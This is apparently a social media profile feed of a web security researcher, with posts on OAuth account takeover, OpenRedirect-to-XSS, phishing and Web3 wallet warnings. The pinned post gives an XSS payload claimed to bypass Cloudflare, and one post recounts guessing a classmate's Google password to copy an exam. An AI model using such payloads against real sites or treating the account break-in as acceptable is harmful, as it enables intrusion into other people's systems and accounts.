@theSouilos Profile picture

souilos

@theSouilos

Security Researcher 🥷 Securing Web3 by targeting Web2 weaknesses || Born in 🇫🇷 living in 🇦🇷

Pinned

XSS Payload bypassing CloudFlare <Svg%20Only=1%20OnLoad=confirm(atob(%27Q2xvdWRmbGFyZSBieXBhc3NlZA==%27))>

Tweet Image 1

A bit of France in 🇦🇷 @yeswehack @Brumens2

Tweet Image 1

Using that checklist allowed me to find an account takeover on the very first web app I checked. As more and more apps use OAuth, check that out: medium.com/@Az3m/account-…


Memories from a world where bitcoin doesn’t exist.

Tweet Image 1
Tweet Image 2

souilos Reposted

Read “How I Found an SQL Injection in coupon code“ by Ghee1337 on Medium: medium.com/@gheeX/how-i-f…


souilos Reposted

🚨 Alert for Frontier Wallet Users! 🚨 ⏩Create a new seed in a secure wallet and transfer your funds ASAP.⏪ Any website can access your private keys. Despite our attempts to contact @FrontierDotXYZ over the past year, we have received no response. ⏳📣Tech details next week.


souilos Reposted

Since its launch a year ago, my web3 security company has both paid out to security researchers & profited >$1,000,000 USD. Secured Aave, Uniswap, LayerZero, Ethena. We are celebrating with a giveaway. You need to like, retweet & comment. 4 winners, $500 each, 48hrs. Good luck🫡


My dream position? A security position in Web3, showing how Web2 attacks vectors are present in Web3 hacks. Working closely with clients and security researchers to enhance protocols and users security.


OpenRedirect to XSS This vulnerability could allow an attacker to: Steal user session cookies Perform phishing attacks Deface the website Take control of user accounts

Tweet Image 1

souilos Reposted

🚨 Beware of scammers! 🚨 Certora doesn’t request NFTs at any of our events. If you see someone doing this, it’s not us. Stick to our official channels for updates and stay safe!

Tweet Image 1

Is Oauth safe? It depends. If once authenticated (with Fb or Google) you can change the email address of the account without having to verify it, this can lead to account spoofing. Then if you can set a new password it’s an account takeover.


Finding vulnerabilities in malicious web apps used for phishing campaigns.

Tweet Image 1

« Draw a picture of my current life based on what you know about me »

Tweet Image 1

I remember my first hack it was at University. Let’s say I was not the best student when I was not interested into something. The best student of the class has for password on Google is birthday date… I copied / pasted the whole exam and had a better grade than him.


Should we start a Phishing Series @PabloSabbatella ?

Tweet Image 1

It's unfortunate to see amazing projects or new companies making millions and underestimating security. We report bugs, it's ok if you don't wanna do security audits but PLEASE PATCH THE VULNERABILITIES FOR THE SAKE OF YOUR USERS. If you don't care, we do.


A successful phishing campaign will probably combine different techniques such as Spear Phishing + Vishing.


souilos Reposted

80% of recent losses in Web3 came from hacking people, not smart contracts Excited to have @PabloSabbatella , OpSec & Blockchain Security researcher @_SEAL_Org , speaking at DSS 2024! In his talk "Professionals hack people, not systems", Pablo will walk you through real cases…

Tweet Image 1

United States Trends
Loading...

Something went wrong.


Something went wrong.